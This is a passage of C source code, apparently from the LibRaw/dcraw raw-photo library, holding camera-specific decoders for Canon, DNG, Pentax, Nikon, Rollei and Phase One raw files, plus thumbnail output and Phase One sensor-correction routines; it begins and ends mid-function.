#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (unique_id == 0x80000218 ||
unique_id == 0x80000250 ||
unique_id == 0x80000261 ||
unique_id == 0x80000281 ||
unique_id == 0x80000287) {
rp[1] = (rp[1] << 2) + hue;
rp[2] = (rp[2] << 2) + hue;
pix[0] = rp[0] + (( 50*rp[1] + 22929*rp[2]) >> 14);
pix[1] = rp[0] + ((-5640*rp[1] - 11751*rp[2]) >> 14);
pix[2] = rp[0] + ((29040*rp[1] - 101*rp[2]) >> 14);
} else {
if (unique_id < 0x80000218) rp[0] -= 512;
pix[0] = rp[0] + rp[2];
pix[2] = rp[0] + rp[1];
pix[1] = rp[0] + ((-778*rp[1] - (rp[2] << 11)) >> 12);
}
FORC3 rp[c] = CLIP(pix[c] * sraw_mul[c] >> 10);
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
ljpeg_end (&jh);
throw ;
}
height = saved_h;
width = saved_w;
#endif
ljpeg_end (&jh);
maximum = 0x3fff;
}
void CLASS adobe_copy_pixel (unsigned row, unsigned col, ushort **rp)
{
int c;
if (tiff_samples == 2 && shot_select) (*rp)++;
if (raw_image) {
if (row < raw_height && col < raw_width)
RAW(row,col) = curve[**rp];
*rp += tiff_samples;
} else {
if (row < height && col < width)
FORC(tiff_samples)
image[row*width+col][c] = curve[(*rp)[c]];
*rp += tiff_samples;
}
if (tiff_samples == 2 && shot_select) (*rp)--;
}
void CLASS ljpeg_idct (struct jhead *jh)
{
int c, i, j, len, skip, coef;
float work[3][8][8];
static float cs[106] = { 0 };
static const uchar zigzag[80] =
{ 0, 1, 8,16, 9, 2, 3,10,17,24,32,25,18,11, 4, 5,12,19,26,33,
40,48,41,34,27,20,13, 6, 7,14,21,28,35,42,49,56,57,50,43,36,
29,22,15,23,30,37,44,51,58,59,52,45,38,31,39,46,53,60,61,54,
47,55,62,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63 };
if (!cs[0])
FORC(106) cs[c] = cos((c & 31)*M_PI/16)/2;
memset (work, 0, sizeof work);
work[0][0][0] = jh->vpred[0] += ljpeg_diff (jh->huff[0]) * jh->quant[0];
for (i=1; i < 64; i++ ) {
len = gethuff (jh->huff[16]);
i += skip = len >> 4;
if (!(len &= 15) && skip < 15) break;
coef = getbits(len);
if ((coef & (1 << (len-1))) == 0)
coef -= (1 << len) - 1;
((float *)work)[zigzag[i]] = coef * jh->quant[i];
}
FORC(8) work[0][0][c] *= M_SQRT1_2;
FORC(8) work[0][c][0] *= M_SQRT1_2;
for (i=0; i < 8; i++)
for (j=0; j < 8; j++)
FORC(8) work[1][i][j] += work[0][i][c] * cs[(j*2+1)*c];
for (i=0; i < 8; i++)
for (j=0; j < 8; j++)
FORC(8) work[2][i][j] += work[1][c][j] * cs[(i*2+1)*c];
FORC(64) jh->idct[c] = CLIP(((float *)work[2])[c]+0.5);
}
void CLASS lossless_dng_load_raw()
{
unsigned save, trow=0, tcol=0, jwide, jrow, jcol, row, col, i, j;
struct jhead jh;
ushort *rp;
while (trow < raw_height) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
save = ftell(ifp);
if (tile_length < INT_MAX)
fseek (ifp, get4(), SEEK_SET);
if (!ljpeg_start (&jh, 0)) break;
jwide = jh.wide;
if (filters) jwide *= jh.clrs;
jwide /= MIN (is_raw, tiff_samples);
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
switch (jh.algo) {
case 0xc1:
jh.vpred[0] = 16384;
getbits(-1);
for (jrow=0; jrow+7 < jh.high; jrow += 8) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (jcol=0; jcol+7 < jh.wide; jcol += 8) {
ljpeg_idct (&jh);
rp = jh.idct;
row = trow + jcol/tile_width + jrow*2;
col = tcol + jcol%tile_width;
for (i=0; i < 16; i+=2)
for (j=0; j < 8; j++)
adobe_copy_pixel (row+i, col+j, &rp);
}
}
break;
case 0xc3:
for (row=col=jrow=0; jrow < jh.high; jrow++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
rp = ljpeg_row (jrow, &jh);
for (jcol=0; jcol < jwide; jcol++) {
adobe_copy_pixel (trow+row, tcol+col, &rp);
if (++col >= tile_width || col >= raw_width)
row += 1 + (col = 0);
}
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
ljpeg_end (&jh);
throw ;
}
#endif
fseek (ifp, save+4, SEEK_SET);
if ((tcol += tile_width) >= raw_width)
trow += tile_length + (tcol = 0);
ljpeg_end (&jh);
}
}
void CLASS packed_dng_load_raw()
{
ushort *pixel, *rp;
int row, col;
pixel = (ushort *) calloc (raw_width, tiff_samples*sizeof *pixel);
merror (pixel, "packed_dng_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (tiff_bps == 16)
read_shorts (pixel, raw_width * tiff_samples);
else {
getbits(-1);
for (col=0; col < raw_width * tiff_samples; col++)
pixel[col] = getbits(tiff_bps);
}
for (rp=pixel, col=0; col < raw_width; col++)
adobe_copy_pixel (row, col, &rp);
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
free (pixel);
throw ;
}
#endif
free (pixel);
}
void CLASS pentax_load_raw()
{
ushort bit[2][15], huff[4097];
int dep, row, col, diff, c, i;
ushort vpred[2][2] = {{0,0},{0,0}}, hpred[2];
fseek (ifp, meta_offset, SEEK_SET);
dep = (get2() + 12) & 15;
fseek (ifp, 12, SEEK_CUR);
FORC(dep) bit[0][c] = get2();
FORC(dep) bit[1][c] = fgetc(ifp);
FORC(dep)
for (i=bit[0][c]; i <= ((bit[0][c]+(4096 >> bit[1][c])-1) & 4095); )
huff[++i] = bit[1][c] << 8 | c;
huff[0] = 12;
fseek (ifp, data_offset, SEEK_SET);
getbits(-1);
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < raw_width; col++) {
diff = ljpeg_diff (huff);
if (col < 2) hpred[col] = vpred[row & 1][col] += diff;
else hpred[col & 1] += diff;
RAW(row,col) = hpred[col & 1];
if (hpred[col & 1] >> tiff_bps) derror();
}
}
}
#ifdef LIBRAW_LIBRARY_BUILD
void CLASS nikon_coolscan_load_raw()
{
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
int bypp = tiff_bps <= 8 ? 1 : 2;
int bufsize = width * 3 * bypp;
if (tiff_bps <= 8)
gamma_curve(1.0 / imgdata.params.coolscan_nef_gamma, 0., 1, 255);
else
gamma_curve(1.0/imgdata.params.coolscan_nef_gamma,0.,1,65535);
fseek (ifp, data_offset, SEEK_SET);
unsigned char *buf = (unsigned char*)malloc(bufsize);
unsigned short *ubuf = (unsigned short *)buf;
for(int row = 0; row < raw_height; row++)
{
int red = fread (buf, 1, bufsize, ifp);
unsigned short (*ip)[4] = (unsigned short (*)[4]) image + row*width;
if(tiff_bps <= 8)
for(int col=0; col<width;col++)
{
ip[col][0] = curve[buf[col*3]];
ip[col][1] = curve[buf[col*3+1]];
ip[col][2] = curve[buf[col*3+2]];
ip[col][3]=0;
}
else
for(int col=0; col<width;col++)
{
ip[col][0] = curve[ubuf[col*3]];
ip[col][1] = curve[ubuf[col*3+1]];
ip[col][2] = curve[ubuf[col*3+2]];
ip[col][3]=0;
}
}
free(buf);
}
#endif
void CLASS nikon_load_raw()
{
static const uchar nikon_tree[][32] = {
{ 0,1,5,1,1,1,1,1,1,2,0,0,0,0,0,0, /* 12-bit lossy */
5,4,3,6,2,7,1,0,8,9,11,10,12 },
{ 0,1,5,1,1,1,1,1,1,2,0,0,0,0,0,0, /* 12-bit lossy after split */
0x39,0x5a,0x38,0x27,0x16,5,4,3,2,1,0,11,12,12 },
{ 0,1,4,2,3,1,2,0,0,0,0,0,0,0,0,0, /* 12-bit lossless */
5,4,6,3,7,2,8,1,9,0,10,11,12 },
{ 0,1,4,3,1,1,1,1,1,2,0,0,0,0,0,0, /* 14-bit lossy */
5,6,4,7,8,3,9,2,1,0,10,11,12,13,14 },
{ 0,1,5,1,1,1,1,1,1,1,2,0,0,0,0,0, /* 14-bit lossy after split */
8,0x5c,0x4b,0x3a,0x29,7,6,5,4,3,2,1,0,13,14 },
{ 0,1,4,2,2,3,1,2,0,0,0,0,0,0,0,0, /* 14-bit lossless */
7,6,8,5,9,4,10,3,11,12,2,0,1,13,14 } };
ushort *huff, ver0, ver1, vpred[2][2], hpred[2], csize;
int i, min, max, step=0, tree=0, split=0, row, col, len, shl, diff;
fseek (ifp, meta_offset, SEEK_SET);
ver0 = fgetc(ifp);
ver1 = fgetc(ifp);
if (ver0 == 0x49 || ver1 == 0x58)
fseek (ifp, 2110, SEEK_CUR);
if (ver0 == 0x46) tree = 2;
if (tiff_bps == 14) tree += 3;
read_shorts (vpred[0], 4);
max = 1 << tiff_bps & 0x7fff;
if ((csize = get2()) > 1)
step = max / (csize-1);
if (ver0 == 0x44 && ver1 == 0x20 && step > 0) {
for (i=0; i < csize; i++)
curve[i*step] = get2();
for (i=0; i < max; i++)
curve[i] = ( curve[i-i%step]*(step-i%step) +
curve[i-i%step+step]*(i%step) ) / step;
fseek (ifp, meta_offset+562, SEEK_SET);
split = get2();
} else if (ver0 != 0x46 && csize <= 0x4001)
read_shorts (curve, max=csize);
while (curve[max-2] == curve[max-1]) max--;
huff = make_decoder (nikon_tree[tree]);
fseek (ifp, data_offset, SEEK_SET);
getbits(-1);
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (min=row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (split && row == split) {
free (huff);
huff = make_decoder (nikon_tree[tree+1]);
max += (min = 16) << 1;
}
for (col=0; col < raw_width; col++) {
i = gethuff(huff);
len = i & 15;
shl = i >> 4;
diff = ((getbits(len-shl) << 1) + 1) << shl >> 1;
if ((diff & (1 << (len-1))) == 0)
diff -= (1 << len) - !shl;
if (col < 2) hpred[col] = vpred[row & 1][col] += diff;
else hpred[col & 1] += diff;
if ((ushort)(hpred[col & 1] + min) >= max) derror();
RAW(row,col) = curve[LIM((short)hpred[col & 1],0,0x3fff)];
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
free (huff);
throw;
}
#endif
free (huff);
}
void CLASS nikon_yuv_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
int row, col, yuv[4], rgb[3], b, c;
UINT64 bitbuf=0;
float cmul[4];
FORC4 { cmul[c] = cam_mul[c]>0.001f?cam_mul[c]:1.f; }
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < raw_width; col++) {
if (!(b = col & 1)) {
bitbuf = 0;
FORC(6) bitbuf |= (UINT64) fgetc(ifp) << c*8;
FORC(4) yuv[c] = (bitbuf >> c*12 & 0xfff) - (c >> 1 << 11);
}
rgb[0] = yuv[b] + 1.370705*yuv[3];
rgb[1] = yuv[b] - 0.337633*yuv[2] - 0.698001*yuv[3];
rgb[2] = yuv[b] + 1.732446*yuv[2];
FORC3 image[row*width+col][c] = curve[LIM(rgb[c],0,0xfff)] / cmul[c];
}
}
}
/*
Returns 1 for a Coolpix 995, 0 for anything else.
*/
int CLASS nikon_e995()
{
int i, histo[256];
const uchar often[] = { 0x00, 0x55, 0xaa, 0xff };
memset (histo, 0, sizeof histo);
fseek (ifp, -2000, SEEK_END);
for (i=0; i < 2000; i++)
histo[fgetc(ifp)]++;
for (i=0; i < 4; i++)
if (histo[often[i]] < 200)
return 0;
return 1;
}
/*
Returns 1 for a Coolpix 2100, 0 for anything else.
*/
int CLASS nikon_e2100()
{
uchar t[12];
int i;
fseek (ifp, 0, SEEK_SET);
for (i=0; i < 1024; i++) {
fread (t, 1, 12, ifp);
if (((t[2] & t[4] & t[7] & t[9]) >> 4
& t[1] & t[6] & t[8] & t[11] & 3) != 3)
return 0;
}
return 1;
}
void CLASS nikon_3700()
{
int bits, i;
uchar dp[24];
static const struct {
int bits;
char t_make[12], t_model[15];
} table[] = {
{ 0x00, "Pentax", "Optio 33WR" },
{ 0x03, "Nikon", "E3200" },
{ 0x32, "Nikon", "E3700" },
{ 0x33, "Olympus", "C740UZ" } };
fseek (ifp, 3072, SEEK_SET);
fread (dp, 1, 24, ifp);
bits = (dp[8] & 3) << 4 | (dp[20] & 3);
for (i=0; i < sizeof table / sizeof *table; i++)
if (bits == table[i].bits) {
strcpy (make, table[i].t_make );
strcpy (model, table[i].t_model);
}
}
/*
Separates a Minolta DiMAGE Z2 from a Nikon E4300.
*/
int CLASS minolta_z2()
{
int i, nz;
char tail[424];
fseek (ifp, -sizeof tail, SEEK_END);
fread (tail, 1, sizeof tail, ifp);
for (nz=i=0; i < sizeof tail; i++)
if (tail[i]) nz++;
return nz > 20;
}
//@end COMMON
void CLASS jpeg_thumb();
//@out COMMON
void CLASS ppm_thumb()
{
char *thumb;
thumb_length = thumb_width*thumb_height*3;
thumb = (char *) malloc (thumb_length);
merror (thumb, "ppm_thumb()");
fprintf (ofp, "P6\n%d %d\n255\n", thumb_width, thumb_height);
fread (thumb, 1, thumb_length, ifp);
fwrite (thumb, 1, thumb_length, ofp);
free (thumb);
}
void CLASS ppm16_thumb()
{
int i;
char *thumb;
thumb_length = thumb_width*thumb_height*3;
thumb = (char *) calloc (thumb_length, 2);
merror (thumb, "ppm16_thumb()");
read_shorts ((ushort *) thumb, thumb_length);
for (i=0; i < thumb_length; i++)
thumb[i] = ((ushort *) thumb)[i] >> 8;
fprintf (ofp, "P6\n%d %d\n255\n", thumb_width, thumb_height);
fwrite (thumb, 1, thumb_length, ofp);
free (thumb);
}
void CLASS layer_thumb()
{
int i, c;
char *thumb, map[][4] = { "012","102" };
colors = thumb_misc >> 5 & 7;
thumb_length = thumb_width*thumb_height;
thumb = (char *) calloc (colors, thumb_length);
merror (thumb, "layer_thumb()");
fprintf (ofp, "P%d\n%d %d\n255\n",
5 + (colors >> 1), thumb_width, thumb_height);
fread (thumb, thumb_length, colors, ifp);
for (i=0; i < thumb_length; i++)
FORCC putc (thumb[i+thumb_length*(map[thumb_misc >> 8][c]-'0')], ofp);
free (thumb);
}
void CLASS rollei_thumb()
{
unsigned i;
ushort *thumb;
thumb_length = thumb_width * thumb_height;
thumb = (ushort *) calloc (thumb_length, 2);
merror (thumb, "rollei_thumb()");
fprintf (ofp, "P6\n%d %d\n255\n", thumb_width, thumb_height);
read_shorts (thumb, thumb_length);
for (i=0; i < thumb_length; i++) {
putc (thumb[i] << 3, ofp);
putc (thumb[i] >> 5 << 2, ofp);
putc (thumb[i] >> 11 << 3, ofp);
}
free (thumb);
}
void CLASS rollei_load_raw()
{
uchar pixel[10];
unsigned iten = 0, isix, i, buffer = 0, todo[16];
#ifdef LIBRAW_LIBRARY_BUILD
if(raw_width > 32767 || raw_height > 32767)
throw LIBRAW_EXCEPTION_IO_BADFILE;
#endif
unsigned maxpixel = raw_width*(raw_height+7);
isix = raw_width * raw_height * 5 / 8;
while (fread (pixel, 1, 10, ifp) == 10) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (i=0; i < 10; i+=2) {
todo[i] = iten++;
todo[i+1] = pixel[i] << 8 | pixel[i+1];
buffer = pixel[i] >> 2 | buffer << 6;
}
for ( ; i < 16; i+=2) {
todo[i] = isix++;
todo[i+1] = buffer >> (14-i)*5;
}
for (i = 0; i < 16; i += 2)
if(todo[i] < maxpixel)
raw_image[todo[i]] = (todo[i + 1] & 0x3ff);
else
derror();
}
maximum = 0x3ff;
}
int CLASS raw (unsigned row, unsigned col)
{
return (row < raw_height && col < raw_width) ? RAW(row,col) : 0;
}
void CLASS phase_one_flat_field (int is_float, int nc)
{
ushort head[8];
unsigned wide, high, y, x, c, rend, cend, row, col;
float *mrow, num, mult[4];
read_shorts (head, 8);
if (head[2] * head[3] * head[4] * head[5] == 0) return;
wide = head[2] / head[4] + (head[2] % head[4] != 0);
high = head[3] / head[5] + (head[3] % head[5] != 0);
mrow = (float *) calloc (nc*wide, sizeof *mrow);
merror (mrow, "phase_one_flat_field()");
for (y=0; y < high; y++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (x=0; x < wide; x++)
for (c=0; c < nc; c+=2) {
num = is_float ? getreal(11) : get2()/32768.0;
if (y==0) mrow[c*wide+x] = num;
else mrow[(c+1)*wide+x] = (num - mrow[c*wide+x]) / head[5];
}
if (y==0) continue;
rend = head[1] + y*head[5];
for (row = rend-head[5];
row < raw_height && row < rend &&
row < head[1]+head[3]-head[5]; row++) {
for (x=1; x < wide; x++) {
for (c=0; c < nc; c+=2) {
mult[c] = mrow[c*wide+x-1];
mult[c+1] = (mrow[c*wide+x] - mult[c]) / head[4];
}
cend = head[0] + x*head[4];
for (col = cend-head[4];
col < raw_width &&
col < cend && col < head[0]+head[2]-head[4]; col++) {
c = nc > 2 ? FC(row-top_margin,col-left_margin) : 0;
if (!(c & 1)) {
c = RAW(row,col) * mult[c];
RAW(row,col) = LIM(c,0,65535);
}
for (c=0; c < nc; c+=2)
mult[c] += mult[c+1];
}
}
for (x=0; x < wide; x++)
for (c=0; c < nc; c+=2)
mrow[c*wide+x] += mrow[(c+1)*wide+x];
}
}
free (mrow);
}
int CLASS phase_one_correct()
{
unsigned entries, tag, data, save, col, row, type;
int len, i, j, k, cip, val[4], dev[4], sum, max;
int head[9], diff, mindiff=INT_MAX, off_412=0;
/* static */ const signed char dir[12][2] =
{ {-1,-1}, {-1,1}, {1,-1}, {1,1}, {-2,0}, {0,-2}, {0,2}, {2,0},
{-2,-2}, {-2,2}, {2,-2}, {2,2} };
float poly[8], num, cfrac, frac, mult[2], *yval[2]={NULL,NULL};
ushort *xval[2];
int qmult_applied = 0, qlin_applied = 0;
#ifdef LIBRAW_LIBRARY_BUILD
if (!meta_length)
#else
if (half_size || !meta_length)
#endif
return 0;
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("Phase One correction...\n"));
#endif
fseek (ifp, meta_offset, SEEK_SET);
order = get2();
fseek (ifp, 6, SEEK_CUR);
fseek (ifp, meta_offset+get4(), SEEK_SET);
entries = get4(); get4();
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
while (entries--) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
tag = get4();
len = get4();
data = get4();
save = ftell(ifp);
fseek (ifp, meta_offset+data, SEEK_SET);
if (tag == 0x419) { /* Polynomial curve */
for (get4(), i=0; i < 8; i++)
poly[i] = getreal(11);
poly[3] += (ph1.tag_210 - poly[7]) * poly[6] + 1;
for (i=0; i < 0x10000; i++) {
num = (poly[5]*i + poly[3])*i + poly[1];
curve[i] = LIM(num,0,65535);
} goto apply; /* apply to right half */
} else if (tag == 0x41a) { /* Polynomial curve */
for (i=0; i < 4; i++)
poly[i] = getreal(11);
for (i=0; i < 0x10000; i++) {
for (num=0, j=4; j--; )
num = num * i + poly[j];
curve[i] = LIM(num+i,0,65535);
} apply: /* apply to whole image */
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col = (tag & 1)*ph1.split_col; col < raw_width; col++)
RAW(row,col) = curve[RAW(row,col)];
}
} else if (tag == 0x400) { /* Sensor defects */
while ((len -= 8) >= 0) {
col = get2();
row = get2();
type = get2(); get2();
if (col >= raw_width) continue;
if (type == 131 || type == 137) /* Bad column */
for (row=0; row < raw_height; row++)
if (FC(row-top_margin,col-left_margin) == 1) {
for (sum=i=0; i < 4; i++)
sum += val[i] = raw (row+dir[i][0], col+dir[i][1]);
for (max=i=0; i < 4; i++) {
dev[i] = abs((val[i] << 2) - sum);
if (dev[max] < dev[i]) max = i;
}
RAW(row,col) = (sum - val[max])/3.0 + 0.5;
} else {
for (sum=0, i=8; i < 12; i++)
sum += raw (row+dir[i][0], col+dir[i][1]);
RAW(row,col) = 0.5 + sum * 0.0732233 +
(raw(row,col-2) + raw(row,col+2)) * 0.3535534;
}
else if (type == 129) { /* Bad pixel */
if (row >= raw_height) continue;
j = (FC(row-top_margin,col-left_margin) != 1) * 4;
for (sum=0, i=j; i < j+8; i++)
sum += raw (row+dir[i][0], col+dir[i][1]);
RAW(row,col) = (sum + 4) >> 3;
}
}
} else if (tag == 0x401) { /* All-color flat fields */
phase_one_flat_field (1, 2);
} else if (tag == 0x416 || tag == 0x410) {
phase_one_flat_field (0, 2);
} else if (tag == 0x40b) { /* Red+blue flat field */
phase_one_flat_field (0, 4);
} else if (tag == 0x412) {
fseek (ifp, 36, SEEK_CUR);
diff = abs (get2() - ph1.tag_21a);
if (mindiff > diff) {
mindiff = diff;
off_412 = ftell(ifp) - 38;
}
} else if (tag == 0x41f && !qlin_applied) { /* Quadrant linearization */
ushort lc[2][2][16], ref[16];
int qr, qc;
for (qr = 0; qr < 2; qr++)
for (qc = 0; qc < 2; qc++)
for (i = 0; i < 16; i++)
lc[qr][qc][i] = get4();
for (i = 0; i < 16; i++) {
int v = 0;
for (qr = 0; qr < 2; qr++)
for (qc = 0; qc < 2; qc++)
v += lc[qr][qc][i];
ref[i] = (v + 2) >> 2;
}
for (qr = 0; qr < 2; qr++) {
for (qc = 0; qc < 2; qc++) {
int cx[19], cf[19];
for (i = 0; i < 16; i++) {
cx[1+i] = lc[qr][qc][i];
cf[1+i] = ref[i];
}
cx[0] = cf[0] = 0;
cx[17] = cf[17] = ((unsigned int)ref[15] * 65535) / lc[qr][qc][15];
cf[18] = cx[18] = 65535;
cubic_spline(cx, cf, 19);
for (row = (qr ? ph1.split_row : 0);
row < (qr ? raw_height : ph1.split_row); row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col = (qc ? ph1.split_col : 0);
col < (qc ? raw_width : ph1.split_col); col++)
RAW(row,col) = curve[RAW(row,col)];
}
}
}
qlin_applied = 1;
} else if (tag == 0x41e && !qmult_applied) { /* Quadrant multipliers */
float qmult[2][2] = { { 1, 1 }, { 1, 1 } };
get4(); get4(); get4(); get4();
qmult[0][0] = 1.0 + getreal(11);
get4(); get4(); get4(); get4(); get4();
qmult[0][1] = 1.0 + getreal(11);
get4(); get4(); get4();
qmult[1][0] = 1.0 + getreal(11);
get4(); get4(); get4();
qmult[1][1] = 1.0 + getreal(11);
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < raw_width; col++) {
i = qmult[row >= ph1.split_row][col >= ph1.split_col] * RAW(row,col);
RAW(row,col) = LIM(i,0,65535);
}
}
qmult_applied = 1;
} else if (tag == 0x431 && !qmult_applied) { /* Quadrant combined */
ushort lc[2][2][7], ref[7];
int qr, qc;
for (i = 0; i < 7; i++)
ref[i] = get4();
for (qr = 0; qr < 2; qr++)
for (qc = 0; qc < 2; qc++)
for (i = 0; i < 7; i++)
lc[qr][qc][i] = get4();
for (qr = 0; qr < 2; qr++) {
for (qc = 0; qc < 2; qc++) {
int cx[9], cf[9];
for (i = 0; i < 7; i++) {
cx[1+i] = ref[i];
cf[1+i] = ((unsigned) ref[i] * lc[qr][qc][i]) / 10000;
}
cx[0] = cf[0] = 0;
cx[8] = cf[8] = 65535;
cubic_spline(cx, cf, 9);
for (row = (qr ? ph1.split_row : 0);
row < (qr ? raw_height : ph1.split_row); row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col = (qc ? ph1.split_col : 0);
col < (qc ? raw_width : ph1.split_col); col++)
RAW(row,col) = curve[RAW(row,col)];
}
}
}
qmult_applied = 1;
qlin_applied = 1;
}
fseek (ifp, save, SEEK_SET);
}
if (off_412) {
fseek (ifp, off_412, SEEK_SET);
for (i=0; i < 9; i++) head[i] = get4() & 0x7fff;
yval[0] = (float *) calloc (head[1]*head[3] + head[2]*head[4], 6);
merror (yval[0], "phase_one_correct()");
yval[1] = (float *) (yval[0] + head[1]*head[3]);
xval[0] = (ushort *) (yval[1] + head[2]*head[4]);
xval[1] = (ushort *) (xval[0] + head[1]*head[3]);
get2();
for (i=0; i < 2; i++)
for (j=0; j < head[i+1]*head[i+3]; j++)
yval[i][j] = getreal(11);
for (i=0; i < 2; i++)
for (j=0; j < head[i+1]*head[i+3]; j++)
xval[i][j] = get2();
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < raw_width; col++) {
cfrac = (float) col * head[3] / raw_width;
cfrac -= cip = cfrac;
num = RAW(row,col) * 0.5;
for (i=cip; i < cip+2; i++) {
for (k=j=0; j < head[1]; j++)
if (num < xval[0][k = head[1]*i+j]) break;
frac = (j == 0 || j == head[1]) ? 0 :
(xval[0][k] - num) / (xval[0][k] - xval[0][k-1]);
mult[i-cip] = yval[0][k-1] * frac + yval[0][k] * (1-frac);
}
i = ((mult[0] * (1-cfrac) + mult[1] * cfrac) * row + num) * 2;
RAW(row,col) = LIM(i,0,65535);
}
}
free (yval[0]);
}
#ifdef LIBRAW_LIBRARY_BUILD
}
catch (...)
{
if(yval[0]) free(yval[0]);
return LIBRAW_CANCELLED_BY_CALLBACK;
}
#endif
return 0;
}
void CLASS phase_one_load_raw()
{
int a, b, i;
ushort akey, bkey, t_mask;
fseek (ifp, ph1.key_off, SEEK_SET);
akey = get2();
bkey = get2();
t_mask = ph1.format == 1 ? 0x5555:0x1354;
#ifdef LIBRAW_LIBRARY_BUILD
if (ph1.black_col || ph1.black_row )
{
imgdata.rawdata.ph1_cblack = (short(*)[2])calloc(raw_height*2,sizeof(ushort));
merror(imgdata.rawdata.ph1_cblack,"phase_one_load_raw()");
imgdata.rawdata.ph1_rblack = (short(*)[2])calloc(raw_width*2,sizeof(ushort));
merror(imgdata.rawdata.ph1_rblack,"phase_one_load_raw()");
if (ph1.black_col)
{
fseek (ifp, ph1.black_col, SEEK_SET);
read_shorts ((ushort *)imgdata.rawdata.ph1_cblack[0], raw_height*2);
}
if (ph1.black_row)
{
fseek (ifp, ph1.black_row, SEEK_SET);
read_shorts ((ushort *) imgdata.rawdata.ph1_rblack[0], raw_width*2);
}
}
#endif
fseek (ifp, data_offset, SEEK_SET);
read_shorts (raw_image, raw_width*raw_height);
if (ph1.format)
for (i=0; i < raw_width*raw_height; i+=2) {
a = raw_image[i+0] ^ akey;
b = raw_image[i+1] ^ bkey;
raw_image[i+0] = (a & t_mask) | (b & ~t_mask);
raw_image[i+1] = (b & t_mask) | (a & ~t_mask);
}
}
unsigned CLASS ph1_bithuff (int nbits, ushort *huff)
{
#ifndef LIBRAW_NOTHREADS
#define bitbuf tls->ph1_bits.bitbuf
#define vbits tls->ph1_bits.vbits
#else
static UINT64 bitbuf=0;
static int vbits=0;
#endif
unsigned c;
if (nbits == -1)
return bitbuf = vbits = 0;
if (nbits == 0) return 0;
if (vbits < nbits) {
bitbuf = bitbuf << 32 | get4();
vbits += 32;
}
c = bitbuf << (64-vbits) >> (64-nbits);
if (huff) {
vbits -= huff[c] >> 8;
return (uchar) huff[c];
}
vbits -= nbits;
return c;
#ifndef LIBRAW_NOTHREADS
#undef bitbuf
#undef vbits
#endif
}
#define ph1_bits(n) ph1_bithuff(n,0)
#define ph1_huff(h) ph1_bithuff(*h,h+1)
void CLASS phase_one_load_raw_c()
{
static const int length[] = { 8,7,6,9,11,10,5,12,14,13 };
int *offset, len[2], pred[2], row, col, i, j;
ushort *pixel;
short (*c_black)[2], (*r_black)[2];
#ifdef LIBRAW_LIBRARY_BUILD
if(ph1.format == 6)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
pixel = (ushort *) calloc (raw_width*3 + raw_height*4, 2);
merror (pixel, "phase_one_load_raw_c()");
offset = (int *) (pixel + raw_width);
fseek (ifp, strip_offset, SEEK_SET);
for (row=0; row < raw_height; row++)
offset[row] = get4();
c_black = (short (*)[2]) (offset + raw_height);
fseek (ifp, ph1.black_col, SEEK_SET);
if (ph1.black_col)
read_shorts ((ushort *) c_black[0], raw_height*2);
r_black = c_black + raw_height;
fseek (ifp, ph1.black_row, SEEK_SET);
if (ph1.black_row)
read_shorts ((ushort *) r_black[0], raw_width*2);
#ifdef LIBRAW_LIBRARY_BUILD
// Copy data to internal copy (ever if not read)
if (ph1.black_col || ph1.black_row )
{
imgdata.rawdata.ph1_cblack = (short(*)[2])calloc(raw_height*2,sizeof(ushort));
merror(imgdata.rawdata.ph1_cblack,"phase_one_load_raw_c()");
memmove(imgdata.rawdata.ph1_cblack,(ushort*)c_black[0],raw_height*2*sizeof(ushort));
imgdata.rawdata.ph1_rblack = (short(*)[2])calloc(raw_width*2,sizeof(ushort));
merror(imgdata.rawdata.ph1_rblack,"phase_one_load_raw_c()");
memmove(imgdata.rawdata.ph1_rblack,(ushort*)r_black[0],raw_width*2*sizeof(ushort));
}
#endif
for (i=0; i < 256; i++)
curve[i] = i*i / 3.969 + 0.5;
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
fseek (ifp, data_offset + offset[row], SEEK_SET);
ph1_bits(-1);
pred[0] = pred[1] = 0;
for (col=0; col < raw_width; col++) {
if (col >= (raw_width & -8))
len[0] = len[1] = 14;
else if ((col & 7) == 0)
for (i=0; i < 2; i++) {
for (j=0; j < 5 && !ph1_bits(1); j++);
if (j--) len[i] = length[j*2 + ph1_bits(1)];
}
if ((i = len[col & 1]) == 14)
pixel[col] = pred[col & 1] = ph1_bits(16);
else
